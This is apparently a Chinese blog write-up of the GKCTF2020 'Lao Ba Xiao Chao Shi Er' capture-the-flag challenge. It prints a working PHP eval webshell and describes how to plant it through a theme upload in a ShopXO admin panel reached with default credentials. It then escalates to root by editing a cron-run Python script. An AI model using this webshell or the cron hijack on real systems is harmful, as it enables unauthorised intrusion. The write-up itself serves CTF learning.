返回顶部

[GKCTF2020]老八小超市儿

题目给了一个网站的模板
通过扫描进入后台admin.php
默认用户名admin
默认密码搜索得shopxo

在当前主题那里下载默认主题

然后在主题里面传一个一句话木马

<?php
    @eval($_POST[a]);
    phpinfo(); 
?>

用菜刀连接(路径可在浏览器查看源码中找到)

打开flag得知真正的flag在/root/flag
但是没有权限打开/root/
于是查看红色的auto.sh

发现每一分钟执行一个py脚本
查看该脚本
发现脚本有root权限
于是修改py脚本 使得脚本读取/root/flag/并将其写入flag.hint

查看flag.hint 得到flag

posted @ 2020-09-10 20:56  星火不辍  阅读(265)  评论(0编辑  收藏  举报